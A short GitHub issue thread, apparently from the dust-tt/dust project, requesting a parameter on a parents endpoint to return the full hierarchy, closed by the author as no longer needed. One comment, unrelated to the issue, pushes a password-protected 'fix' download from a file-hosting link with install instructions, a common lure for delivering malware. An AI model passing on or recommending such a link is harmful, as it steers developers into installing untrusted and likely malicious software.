### ISSUE TITLE
[Vaults UI] Add parameter to parents endpoint to retrieve full parents hierarchy

### ISSUE THREAD

**Issue by philipperolet** [dust-tt/dust#6927]
As discussed IRL with @flvndvd

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by philipperolet** [comment]
Not needed anymore
